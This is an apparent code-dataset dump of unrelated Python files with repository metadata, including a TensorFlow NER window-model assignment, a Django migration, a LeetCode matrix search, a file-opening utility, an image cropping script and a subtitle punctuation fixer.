https://www.tensorflow.org/api_docs/python/array_ops/shapes_and_shaping#reshape.
Returns:
embeddings: tf.Tensor of shape (None, n_window_features*embed_size)
"""
### YOUR CODE HERE (!3-5 lines)
# self.inputs_placeholder (None, N_window_features)
embedding_tensor = tf.constant(self.pretrained_embeddings)
embedding_staging = tf.nn.embedding_lookup(embedding_tensor, self.input_placeholder, partition_strategy='mod', name=None)
embeddings = tf.reshape(embedding_staging,(-1,self.config.n_window_features*self.config.embed_size))
### END YOUR CODE
return embeddings
def add_prediction_op(self):
"""Adds the 1-hidden-layer NN:
h = Relu(xW + b1)
h_drop = Dropout(h, dropout_rate)
pred = h_dropU + b2
Recall that we are not applying a softmax to pred. The softmax will instead be done in
the add_loss_op function, which improves efficiency because we can use
tf.nn.softmax_cross_entropy_with_logits
When creating a new variable, use the tf.get_variable function
because it lets us specify an initializer.
Use tf.contrib.layers.xavier_initializer to initialize matrices.
This is TensorFlow's implementation of the Xavier initialization
trick we used in last assignment.
Note: tf.nn.dropout takes the keep probability (1 - p_drop) as an argument.
The keep probability should be set to the value of dropout_rate.
Returns:
pred: tf.Tensor of shape (batch_size, n_classes)
"""
x = self.add_embedding()
dropout_rate = self.dropout_placeholder
### YOUR CODE HERE (~10-20 lines)
W = tf.get_variable("W", shape=[self.config.n_window_features*self.config.embed_size, self.config.hidden_size],
initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.get_variable("b1", shape = [self.config.hidden_size], initializer=tf.contrib.layers.xavier_initializer())
h = tf.nn.relu(tf.matmul(x,W) + b1)
h_drop = tf.nn.dropout(h,dropout_rate)
U = tf.get_variable("U", shape=[self.config.hidden_size, self.config.n_classes],
initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.get_variable("b2", shape = [self.config.n_classes], initializer=tf.contrib.layers.xavier_initializer())
pred = tf.matmul(h_drop,U) + b2
### END YOUR CODE
return pred
def add_loss_op(self, pred):
"""Adds Ops for the loss function to the computational graph.
In this case we are using cross entropy loss.
The loss should be averaged over all examples in the current minibatch.
Remember that you can use tf.nn.sparse_softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
pred: A tensor of shape (batch_size, n_classes) containing the output of the neural
network before the softmax layer.
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE (~2-5 lines)
loss_array = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = self.labels_placeholder, logits = pred)
loss = tf.reduce_mean(loss_array)
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE (~1-2 lines)
train_op = tf.train.AdamOptimizer().minimize(loss)
### END YOUR CODE
return train_op
def preprocess_sequence_data(self, examples):
return make_windowed_data(examples, start=self.helper.START, end=self.helper.END, window_size=self.config.window_size)
def consolidate_predictions(self, examples_raw, examples, preds):
"""Batch the predictions into groups of sentence length.
"""
ret = []
#pdb.set_trace()
i = 0
for sentence, labels in examples_raw:
labels_ = preds[i:i+len(sentence)]
i += len(sentence)
ret.append([sentence, labels, labels_])
return ret
def predict_on_batch(self, sess, inputs_batch):
"""Make predictions for the provided batch of data
Args:
sess: tf.Session()
input_batch: np.ndarray of shape (n_samples, n_features)
Returns:
predictions: np.ndarray of shape (n_samples, n_classes)
"""
feed = self.create_feed_dict(inputs_batch)
predictions = sess.run(tf.argmax(self.pred, axis=1), feed_dict=feed)
return predictions
def train_on_batch(self, sess, inputs_batch, labels_batch):
feed = self.create_feed_dict(inputs_batch, labels_batch=labels_batch,
dropout=self.config.dropout)
_, loss = sess.run([self.train_op, self.loss], feed_dict=feed)
return loss
def __init__(self, helper, config, pretrained_embeddings, report=None):
super(WindowModel, self).__init__(helper, config, report)
self.pretrained_embeddings = pretrained_embeddings
# Defining placeholders.
self.input_placeholder = None
self.labels_placeholder = None
self.dropout_placeholder = None
self.build()
def test_make_windowed_data():
sentences = [[[1,1], [2,0], [3,3]]]
sentence_labels = [[1, 2, 3]]
data = zip(sentences, sentence_labels)
w_data = make_windowed_data(data, start=[5,0], end=[6,0], window_size=1)
assert len(w_data) == sum(len(sentence) for sentence in sentences)
assert w_data == [
([5,0] + [1,1] + [2,0], 1,),
([1,1] + [2,0] + [3,3], 2,),
([2,0] + [3,3] + [6,0], 3,),
]
def do_test1(_):
logger.info("Testing make_windowed_data")
test_make_windowed_data()
logger.info("Passed!")
def do_test2(args):
logger.info("Testing implementation of WindowModel")
config = Config()
helper, train, dev, train_raw, dev_raw = load_and_preprocess_data(args)
embeddings = load_embeddings(args, helper)
config.embed_size = embeddings.shape[1]
with tf.Graph().as_default():
logger.info("Building model...",)
start = time.time()
model = WindowModel(helper, config, embeddings)
logger.info("took %.2f seconds", time.time() - start)
init = tf.global_variables_initializer()
saver = None
with tf.Session() as session:
session.run(init)
model.fit(session, saver, train, dev)
logger.info("Model did not crash!")
logger.info("Passed!")
def do_train(args):
# Set up some parameters.
config = Config()
helper, train, dev, train_raw, dev_raw = load_and_preprocess_data(args)
embeddings = load_embeddings(args, helper)
config.embed_size = embeddings.shape[1]
helper.save(config.output_path)
handler = logging.FileHandler(config.log_output)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logging.getLogger().addHandler(handler)
report = None #Report(Config.eval_output)
with tf.Graph().as_default():
logger.info("Building model...",)
start = time.time()
model = WindowModel(helper, config, embeddings)
logger.info("took %.2f seconds", time.time() - start)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as session:
session.run(init)
model.fit(session, saver, train, dev)
if report:
report.log_output(model.output(session, dev_raw))
report.save()
else:
# Save predictions in a text file.
output = model.output(session, dev_raw)
sentences, labels, predictions = zip(*output)
predictions = [[LBLS[l] for l in preds] for preds in predictions]
output = zip(sentences, labels, predictions)
with open(model.config.conll_output, 'w') as f:
write_conll(f, output)
with open(model.config.eval_output, 'w') as f:
for sentence, labels, predictions in output:
print_sentence(f, sentence, labels, predictions)
def do_evaluate(args):
config = Config(args.model_path)
helper = ModelHelper.load(args.model_path)
input_data = read_conll(args.data)
embeddings = load_embeddings(args, helper)
config.embed_size = embeddings.shape[1]
with tf.Graph().as_default():
logger.info("Building model...",)
start = time.time()
model = WindowModel(helper, config, embeddings)
logger.info("took %.2f seconds", time.time() - start)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as session:
session.run(init)
saver.restore(session, model.config.model_output)
for sentence, labels, predictions in model.output(session, input_data):
predictions = [LBLS[l] for l in predictions]
print_sentence(args.output, sentence, labels, predictions)
def do_shell(args):
config = Config(args.model_path)
helper = ModelHelper.load(args.model_path)
embeddings = load_embeddings(args, helper)
config.embed_size = embeddings.shape[1]
with tf.Graph().as_default():
logger.info("Building model...",)
start = time.time()
model = WindowModel(helper, config, embeddings)
logger.info("took %.2f seconds", time.time() - start)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
with tf.Session() as session:
session.run(init)
saver.restore(session, model.config.model_output)
print("""Welcome!
You can use this shell to explore the behavior of your model.
Please enter sentences with spaces between tokens, e.g.,
input> Germany 's representative to the European Union 's veterinary committee .
""")
while True:
# Create simple REPL
try:
sentence = raw_input("input> ")
tokens = sentence.strip().split(" ")
for sentence, _, predictions in model.output(session, [(tokens, ["O"] * len(tokens))]):
predictions = [LBLS[l] for l in predictions]
print_sentence(sys.stdout, sentence, [""] * len(tokens), predictions)
except EOFError:
print("Closing session.")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Trains and tests an NER model')
subparsers = parser.add_subparsers()
command_parser = subparsers.add_parser('test1', help='')
command_parser.set_defaults(func=do_test1)
command_parser = subparsers.add_parser('test2', help='')
command_parser.add_argument('-dt', '--data-train', type=argparse.FileType('r'), default="data/tiny.conll", help="Training data")
command_parser.add_argument('-dd', '--data-dev', type=argparse.FileType('r'), default="data/tiny.conll", help="Dev data")
command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
command_parser.set_defaults(func=do_test2)
command_parser = subparsers.add_parser('train', help='')
command_parser.add_argument('-dt', '--data-train', type=argparse.FileType('r'), default="data/train.conll", help="Training data")
command_parser.add_argument('-dd', '--data-dev', type=argparse.FileType('r'), default="data/dev.conll", help="Dev data")
command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
command_parser.set_defaults(func=do_train)
command_parser = subparsers.add_parser('evaluate', help='')
command_parser.add_argument('-d', '--data', type=argparse.FileType('r'), default="data/dev.conll", help="Training data")
command_parser.add_argument('-m', '--model-path', help="Training data")
command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
command_parser.add_argument('-o', '--output', type=argparse.FileType('w'), default=sys.stdout, help="Training data")
command_parser.set_defaults(func=do_evaluate)
command_parser = subparsers.add_parser('shell', help='')
command_parser.add_argument('-m', '--model-path', help="Training data")
command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
command_parser.set_defaults(func=do_shell)
ARGS = parser.parse_args()
if ARGS.func is None:
parser.print_help()
sys.exit(1)
else:
ARGS.func(ARGS)
| [
"jacobsolawetz@gmail.com"
] | jacobsolawetz@gmail.com |
5bfdfd70e551c90834a8033de5bf56429dacecac | b5e5792c66d61af45b9f93b1a289045f9dbbab96 | /api/migrations/0005_auto_20200509_0112.py | 1e84495100ebf6da261816be2b48bf2d4190df60 | [] | no_license | frankiegu/ecust_annotation | 4c39da1ac4ae643d388f6859f79195139634d2b0 | 115a15942c0ca3b32f06f74d23b3bce6c5ed0163 | refs/heads/master | 2022-10-12T04:15:25.272851 | 2020-05-11T00:39:57 | 2020-05-11T00:39:57 | 295,602,620 | 0 | 3 | null | 2020-09-15T03:19:14 | 2020-09-15T03:19:13 | null | UTF-8 | Python | false | false | 730 | py | # Generated by Django 2.2.5 on 2020-05-09 01:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20200508_0951'),
]
operations = [
migrations.AddField(
model_name='dic',
name='standard',
field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Standard'),
),
migrations.AlterField(
model_name='dic',
name='entity_template',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Entity_template'),
),
]
| [
"kyrieming@126.com"
] | kyrieming@126.com |
e9e335201ab716e0b4e0c4dd41ecd24d930e054d | b7eb41b068614e04f38a969326f43d8f8119cb05 | /74_search_a_2d_matrix.py | ca546b4123fa5936447cab9c7edc0057dcffd1b4 | [] | no_license | YI-DING/daily-leetcode | ddfb6985bf5014886cba8d6219da243e0aa28d71 | a6d3898d900f2063302dc1ffc3dafd61eefa79b7 | refs/heads/master | 2020-05-19T06:07:21.557077 | 2019-07-19T16:31:46 | 2019-07-19T16:31:46 | 184,866,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int):
if not matrix or not matrix[0]:
return False
start, end = 0, len(matrix)-1
while start+1 < end:
mid = (start+end)//2
if matrix[mid][0] > target:
end = mid
else:
start = mid
if matrix[end][0] > target:
row, start, end = start, 0, len(matrix[0])-1
else:
row, start, end = end, 0, len(matrix[0])-1
while start+1 < end:
mid = (start+end)//2
if matrix[row][mid] > target:
end = mid
else:
start = mid
if matrix[row][start] == target:
return True
elif matrix[row][end] == target:
return True
return False
#this method uses BFS twice, first among rows then among cols
#however you could see it as len(m*n) and do binary search for only once | [
"yiding1@uchicago.edu"
] | yiding1@uchicago.edu |
bda08bb1e8392fe0495c5b0f7bc2ba3dc882b580 | 8dc84558f0058d90dfc4955e905dab1b22d12c08 | /third_party/android_ndk/toolchains/llvm/prebuilt/linux-x86_64/tools/scan-view/share/startfile.py | 673935909f823467ad1dd737788133966d2a00e3 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"NCSA",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-arm-llvm-sga",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | meniossin/src | 42a95cc6c4a9c71d43d62bc4311224ca1fd61e03 | 44f73f7e76119e5ab415d4593ac66485e65d700a | refs/heads/master | 2022-12-16T20:17:03.747113 | 2020-09-03T10:43:12 | 2020-09-03T10:43:12 | 263,710,168 | 1 | 0 | BSD-3-Clause | 2020-05-13T18:20:09 | 2020-05-13T18:20:08 | null | UTF-8 | Python | false | false | 6,038 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Utility for opening a file using the default application in a cross-platform
manner. Modified from http://code.activestate.com/recipes/511443/.
"""
__version__ = '1.1x'
__all__ = ['open']
import os
import sys
import webbrowser
import subprocess
_controllers = {}
_open = None
class BaseController(object):
'''Base class for open program controllers.'''
def __init__(self, name):
self.name = name
def open(self, filename):
raise NotImplementedError
class Controller(BaseController):
'''Controller for a generic open program.'''
def __init__(self, *args):
super(Controller, self).__init__(os.path.basename(args[0]))
self.args = list(args)
def _invoke(self, cmdline):
if sys.platform[:3] == 'win':
closefds = False
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
closefds = True
startupinfo = None
if (os.environ.get('DISPLAY') or sys.platform[:3] == 'win' or
sys.platform == 'darwin'):
inout = file(os.devnull, 'r+')
else:
# for TTY programs, we need stdin/out
inout = None
# if possible, put the child precess in separate process group,
# so keyboard interrupts don't affect child precess as well as
# Python
setsid = getattr(os, 'setsid', None)
if not setsid:
setsid = getattr(os, 'setpgrp', None)
pipe = subprocess.Popen(cmdline, stdin=inout, stdout=inout,
stderr=inout, close_fds=closefds,
preexec_fn=setsid, startupinfo=startupinfo)
# It is assumed that this kind of tools (gnome-open, kfmclient,
# exo-open, xdg-open and open for OSX) immediately exit after lauching
# the specific application
returncode = pipe.wait()
if hasattr(self, 'fixreturncode'):
returncode = self.fixreturncode(returncode)
return not returncode
def open(self, filename):
if isinstance(filename, basestring):
cmdline = self.args + [filename]
else:
# assume it is a sequence
cmdline = self.args + filename
try:
return self._invoke(cmdline)
except OSError:
return False
# Platform support for Windows
if sys.platform[:3] == 'win':
class Start(BaseController):
'''Controller for the win32 start progam through os.startfile.'''
def open(self, filename):
try:
os.startfile(filename)
except WindowsError:
# [Error 22] No application is associated with the specified
# file for this operation: '<URL>'
return False
else:
return True
_controllers['windows-default'] = Start('start')
_open = _controllers['windows-default'].open
# Platform support for MacOS
elif sys.platform == 'darwin':
_controllers['open']= Controller('open')
_open = _controllers['open'].open
# Platform support for Unix
else:
import commands
# @WARNING: use the private API of the webbrowser module
from webbrowser import _iscommand
class KfmClient(Controller):
'''Controller for the KDE kfmclient program.'''
def __init__(self, kfmclient='kfmclient'):
super(KfmClient, self).__init__(kfmclient, 'exec')
self.kde_version = self.detect_kde_version()
def detect_kde_version(self):
kde_version = None
try:
info = commands.getoutput('kde-config --version')
for line in info.splitlines():
if line.startswith('KDE'):
kde_version = line.split(':')[-1].strip()
break
except (OSError, RuntimeError):
pass
return kde_version
def fixreturncode(self, returncode):
if returncode is not None and self.kde_version > '3.5.4':
return returncode
else:
return os.EX_OK
def detect_desktop_environment():
'''Checks for known desktop environments
Return the desktop environments name, lowercase (kde, gnome, xfce)
or "generic"
'''
desktop_environment = 'generic'
if os.environ.get('KDE_FULL_SESSION') == 'true':
desktop_environment = 'kde'
elif os.environ.get('GNOME_DESKTOP_SESSION_ID'):
desktop_environment = 'gnome'
else:
try:
info = commands.getoutput('xprop -root _DT_SAVE_MODE')
if ' = "xfce4"' in info:
desktop_environment = 'xfce'
except (OSError, RuntimeError):
pass
return desktop_environment
def register_X_controllers():
if _iscommand('kfmclient'):
_controllers['kde-open'] = KfmClient()
for command in ('gnome-open', 'exo-open', 'xdg-open'):
if _iscommand(command):
_controllers[command] = Controller(command)
def get():
controllers_map = {
'gnome': 'gnome-open',
'kde': 'kde-open',
'xfce': 'exo-open',
}
desktop_environment = detect_desktop_environment()
try:
controller_name = controllers_map[desktop_environment]
return _controllers[controller_name].open
except KeyError:
if _controllers.has_key('xdg-open'):
return _controllers['xdg-open'].open
else:
return webbrowser.open
if os.environ.get("DISPLAY"):
register_X_controllers()
_open = get()
def open(filename):
'''Open a file or an URL in the registered default application.'''
return _open(filename)
| [
"arnaud@geometry.ee"
] | arnaud@geometry.ee |
916bdd6be2ab0c6f52deaa6390bed30b79c41458 | e2069d49028ca0e7640cb9bb65ae2ec93081790d | /classification_convert_crop.py | 27dba3be54b1844a07859604702244c381393b73 | [] | no_license | breadcrumbbuilds/classification-image-functions | 803879e331a4538ce4d3e3dc22045eb1b00b995a | 3a5c7082ca431c10a9ec636cca0e442680dc7a6d | refs/heads/master | 2020-07-07T03:17:55.613761 | 2019-08-28T18:27:25 | 2019-08-28T18:27:25 | 203,228,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,133 | py | """
Created on Fri Aug 16 09:47:57 2019
@author: brad.crump
Script converts and crops data, in future, add the option to not crop data.
Assumes that the input image contains "RGB" and "png".
Still from a naive approach, but has potential to be further generalized.
Use case:
If data has a substantial black background, this script can lessen the black
background. It also writes out a test and train map file for the images.
Folder structure:
present working directory
|_THIS_SCRIPT
|
|_class1
| |_FolderOfData1
| |_FolderOfData2
|_class2
| |_FolderOfData1
| |_FolderOfData2
|_class3
Will convert data out to classes1_classes2_..._classesN-DayAndTime
ie: PonderosaPine_SprucePine_2019-8-15-1356
"""
import os
import cv2
import time
import argparse
def ConvertAndCrop(cropMargin, testPercent):
global CROP_MARGIN
global TEST_SAMPLES
CROP_MARGIN = cropMargin
TEST_SAMPLES = testPercent
### Generate the new folders where we will write the cropped image data
# get the path to the new folder for the data we will convert
convertedDataFolder = makeDirectoryForConvertedData()
print("Folder created: " + convertedDataFolder)
completeMap = open(convertedDataFolder + "\\CompleteMap.RGB.txt", 'w')
# create the subdirectories for each classes
makeClassDirectories(convertedDataFolder)
print("New Classes directories created")
print("Converting Has Started...")
convertData(getCurrentDirectory(), convertedDataFolder, completeMap)
completeMap.close()
splitTrainAndTestData(convertedDataFolder, completeMap)
print("Done")
# returns the working directories path
def getCurrentDirectory():
return os.path.dirname(os.path.realpath(__file__))
"""
Returns a list of png images with RGB in the name of the image
"""
def getPngs(directory):
images = []
# walk the folder
for root, dirs, files in os.walk(directory, topdown=False):
# for each file
for file in files:
# if the file contains the expected strings
if ".png" in file and "RGB" in file:
images.append(root + "\\" +file)
print("Images retrieved")
return images
"""
Create a list of all the Classes in this conversion
"""
def getClassList():
classes = []
# walk the current directory
for root, dirs, files in os.walk(getCurrentDirectory(), topdown=False):
# Don't store the current directory, only the subdirectories
if dirs == getCurrentDirectory() or dirs == []:
continue
# store the directory
classes.append(dirs)
# Currently doing more work than needed:
# os.walk inspects all the subdirectories as well, so we are just
# returning the last index, which is the pwd children
return classes[len(classes)-1]
"""
Creates a directory and returns the path
"""
def makeDirectoryForConvertedData():
# init empty folder name
folderName = ""
# get the Classes and append them to a string
for aClass in getClassList():
folderName = folderName + aClass + "_"
# get the current date and time and append it to the string
year, month, day, hour, minute = map(int, time.strftime("%Y %m %d %H %M").split())
now = str(year) + "-" + str(month) + "-" + str(day) + "-" + str(hour) + "" + '{:02d}'.format(minute)
folderName = folderName + now
# Hard code the location of the new folder in conversions
path = "C:\\Conversions\\" + folderName
# if the path doesn't exist, write it
if not os.path.exists(path):
os.makedirs(path)
return path
"""
Create a directory for each class in this conversion
"""
def makeClassDirectories(folder):
# loop through each class
for aClass in getClassList():
# create a new path for the class
newDir = folder + "\\" + aClass
# if the path doesn't exist, write it
if not os.path.exists(newDir):
os.makedirs(newDir)
"""
Converts data
"""
def convertData(currentDir, convertDir, mapFile):
classMap = 0
# Loop through each folder
for aClass in getClassList():
# create the paths to be used
currentPath = currentDir + "\\" + aClass
convertPath = convertDir + "\\" + aClass
# retrieve all the images to be converted
oldImages = getPngs(currentPath)
# crop and write the images
cropWriteMapImages(oldImages, convertPath, aClass, mapFile, classMap)
classMap = classMap + 1
"""
Crops and writes the image to the convertPath
"""
def cropWriteMapImages(oldImages, convertPath, aClass, mapFile, classMap):
# for each old image
print("Cropping and Writing " + aClass)
print("This may take some time.")
i = 0
for image in oldImages:
croppedImage = cropImage(image)
writeImageAndMap(croppedImage, convertPath, aClass, i, mapFile, classMap)
i = i + 1
print(aClass + " images have been written and cropped")
"""
Crops an image, defaults the margin to 5 pixels
"""
def cropImage(image):
image = cv2.imread(image)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# find the contours of the image (boundary)
x, contours, hierarchy = cv2.findContours(gray,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# find the largest contour (outer boundary)
largestCntArea = 0
i = 0
for c in contours:
# Find the largest contour
if cv2.contourArea(c) > largestCntArea:
largestCntArea = cv2.contourArea(c)
largestCntIndex = i
i = i + 1
largestContour = contours[largestCntIndex]
# Bounding box for the largest contour
x, y, w, h = cv2.boundingRect(largestContour)
# add margin (and center)
h = h + CROP_MARGIN
w = w + CROP_MARGIN
x = x - int(CROP_MARGIN/2)
y = y - int(CROP_MARGIN/2)
# create crop img using the bounding box
return image[y:y+h, x:x+w]
"""
Writes a cropped image to the specified directory
"""
def writeImageAndMap(image, path, aClass, name, mapFile, classMap):
# build the image name
imageName = "\\" + aClass + "_" + str(name) + ".RGB.png"
pathToImage = path + imageName
cv2.imwrite(pathToImage, image)
writeCompleteMap(mapFile, aClass, imageName, classMap)
def writeCompleteMap(file, aClass, imageName, classMap):
file.write("...\\" + aClass + imageName + "\t" + str(classMap) + "\n")
def splitTrainAndTestData(folder, file):
print("Mapping Test and Train data")
test = open(folder + "\\ValidationMap.RGB.txt", 'w')
train = open(folder + "\\TrainMap.RGB.txt", 'w')
testIndex = int(100/TEST_SAMPLES)
i = 0
with open(str(file.name), 'r') as f:
for line in f:
if i % testIndex == 0:
test.write(line)
else:
train.write(line)
i = i + 1
print("Closing Files")
f.close()
test.close()
train.close() | [
"bradrcrump@gmail.com"
] | bradrcrump@gmail.com |
f680454ba7b5af9fc6dc8c24ff0cd85b369acce2 | 55c87755a4d7664e8155ac30a4a2e713afae802d | /check_eos_bisent.py | ec3f638cee49d57e460f0d2be868b876cd2e414d | [] | no_license | seppilee/eval_grammar | c67edb5e1ee5f85689d87939299fed97c0c0d335 | d103a5e187308409f673d0d8deb4e92a9d103eef | refs/heads/master | 2020-03-14T16:51:36.277125 | 2019-05-19T14:34:04 | 2019-05-19T14:34:04 | 131,706,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,882 | py | #!/usr/bin/python
#-*- coding: UTF-8 -*-
import sys
import string
import re
reload(sys)
sys.setdefaultencoding("UTF-8")
def main(strRefFile):
hangul = re.compile('[^a-zA-Z0-9�꽦-�뀭媛�-�옡]+')
nLineNum = 0
lstRef = {}
# read reference file
fref = open(strRefFile, 'r')
while 1:
nLineNum = nLineNum + 1
strLine = fref.readline()
if not strLine:
break
strLine = strLine.strip('\r\n')
nTab = strLine.find('\t')
if nTab < 0:
continue
strSrc = strLine[0:nTab].strip()
strTgt = strLine[nTab+1:].strip()
strKey = hangul.sub('',strTgt) #?
if len(strSrc) <= 0 or len(strTgt) <= 0 or len(strKey) <= 0:
continue
print strKey
lstRef[strKey] = strTgt #?
# read working file for recovery of special character
nLineNum = 0
while 1:
try:
strLine = raw_input("")
except Exception:
break
if not strLine:
break
nLineNum = nLineNum + 1
if (nLineNum % 100) == 0:
sys.stderr.write("\r{0} lines progressed...".format(nLineNum))
line = strLine
nTab = line.find("\t")
if nTab < 0:
sys.stderr.write("{0} Line Error : [{1}]\n".format(nLineNum, line))
continue
strSrc2 = line[0:nTab].strip()
strTgt2 = line[nTab+1:].strip()
if len(strSrc2) <= 0 or len(strTgt2) <= 0:
sys.stderr.write("{0} Line Error : [{1}]\n".format(nLineNum, line))
#continue
strKey = hangul.sub('',strTgt2)
# starting recovery processing
strDiff="FALSE"
if len(strSrc2) <= 0:
strDiff="TRUE"
#print ">>",lstRef[strKey][-1],"<<"
if (strKey in lstRef) == True:
#not found end of sentence symbol and add EOS symbol
if strTgt2[-1] != lstRef[strKey][-1] and (lstRef[strKey][-1] == "." or lstRef[strKey][-1] == "?" or lstRef[strKey][-1] == "!"):
strTgt2 += lstRef[strKey][-1]
print ">>", strTgt2, "<<"
if strTgt2 != lstRef[strKey]:
strDiff="TRUE" # not same with original
strTgt2 = lstRef[strKey]
if len(strSrc2) > 0 and strSrc2[-1] != lstRef[strKey][-1] and strSrc2[-1] != "." and strSrc2[-1] != "?" and strSrc2[-1] != "!" and (lstRef[strKey][-1] == "." or lstRef[strKey][-1] == "?" or lstRef[strKey][-1] == "!"):
strSrc2 += lstRef[strKey][-1]
# print out the recovered file.
sys.stdout.write("{0}\t{1}\t{2}\n".format(strSrc2, strTgt2, strDiff))
sys.stderr.write("\n")
fref.close()
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Example : python copy-period.py reference-file < input-file > output-file"
else:
main(sys.argv[1])
| [
"seppi.lee@hanmail.net"
] | seppi.lee@hanmail.net |
ce7933230d5bc50519059d8bf563e142cacd0f9d | 4f1218079f90a65befbf658679721886d71f4ee8 | /python/hackerrank/birthdaychocolate.py | ef225e1789e29cfa011f85c8ddf433ee3d17c0b9 | [] | no_license | Escaity/Library | 9f57767617422a7930caf48718d18f7ebef81547 | b34d8600e0a65845f1b3a16eb4b98fc7087a3160 | refs/heads/master | 2022-07-29T16:18:33.073738 | 2022-07-17T10:25:22 | 2022-07-17T10:25:22 | 238,588,249 | 0 | 0 | null | 2021-08-17T03:02:34 | 2020-02-06T02:04:08 | Python | UTF-8 | Python | false | false | 213 | py | def birthday(s, d, m):
n = len(s)
cnt = 0
for i in range(n - m + 1):
bar = 0
for j in range(i, i + m):
bar += s[j]
if bar == d:
cnt += 1
return cnt
| [
"esk2306@gmail.com"
] | esk2306@gmail.com |
a76f854b2570b8c9af51c1adba282901b8e156a8 | 71f6cc279029dde917e9d4e51abc8a30927eb520 | /rename_1d.py | 7bd596f84a1443eb11d8b957048e9e0b0a6a909a | [] | no_license | threeHardWorker/auto_tbdata | c2a03a4fb810c904c24c026b8730ea00ef07222e | b5371d7bca2ab80d8e340dce8bda3a07945af1f1 | refs/heads/master | 2020-03-18T17:29:42.143475 | 2018-05-27T09:27:56 | 2018-05-27T09:27:56 | 135,032,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | import os
import sys
if len(sys.argv) != 3:
print('Usage: reanme.py <start date> <end date>\n')
exit(0)
path = 'c:\\tmp\\csv'
s = '10秒'
d = '10s_' + sys.argv[1] + '_' + sys.argv[2]
fs = os.listdir(path)
for f in fs:
os.rename(path + '\\' + f,
path + '\\' + f.replace(s, d)) | [
"stoneguo@126.com"
] | stoneguo@126.com |
da05e53882fe0ea9e33aeee423de00ca20d345e3 | 11a68b37deda3060c76b190436b6e854264d37d6 | /agentredrabbit/agentredrabbit.py | c576fb932fa6820a776ceda46dd108119a9b0938 | [
"MIT"
] | permissive | publicbull/agentredrabbit | c97b98f2e95363da2e3176f5fdafcf35df55de9a | ef31c204904606bf5ef7c4060487a282e6d1d6e3 | refs/heads/master | 2021-01-18T16:19:11.763299 | 2013-09-02T12:53:51 | 2013-09-02T12:53:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,181 | py | """
The main method and signal handlers for agentredrabbit
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
import logging
import os
import pickle
import signal
import sys
import threading
from config import ReadConfig
from utils import log_format
from transport import Transporter
from transport import setFailsafeQueue, getFailsafeQueue
from optparse import OptionParser
except ImportError, err:
print "ImportError", err
import sys
sys.exit(1)
log = logging.getLogger(__name__)
threads = []
shutdown_event = None
def sighandler(signum, frame):
"""
Signal handler method for agentredrabbit. Its purpose is to capture signals
such as SIGTERM, SIGHUP, SIGQUIT, SIGINT and gracefully shutdown all the
thread workers. signum and frame params are passed by `signal`
"""
log.info("Starting graceful shutdown, caught signal #%s" % signum)
global threads, shutdown_event
shutdown_event.set()
for thread in threads:
thread.join()
for thread in threads:
log.info("%s running state = %s" % (thread, thread.is_alive()))
def main():
"""
Main method for agentredrabbit. The workflow consists of parsing cmd arg,
reading config file, have logger, signal handler setup, read from any
previously dumped failsafe queue, configure thread event and lock objects,
start threads and wait till a shutdown event is trigged upon which it dumps
any leftover message from the in memory failsafe queue to a dump file.
"""
log.setLevel(logging.INFO)
parser = OptionParser(usage="%prog [-c config] [-v]",
version="%prog %s")
parser.add_option("-c", "--config",
dest="config_file", default=None,
help="config file")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="increase debug level from INFO to DEBUG")
(options, args) = parser.parse_args()
# Read config file
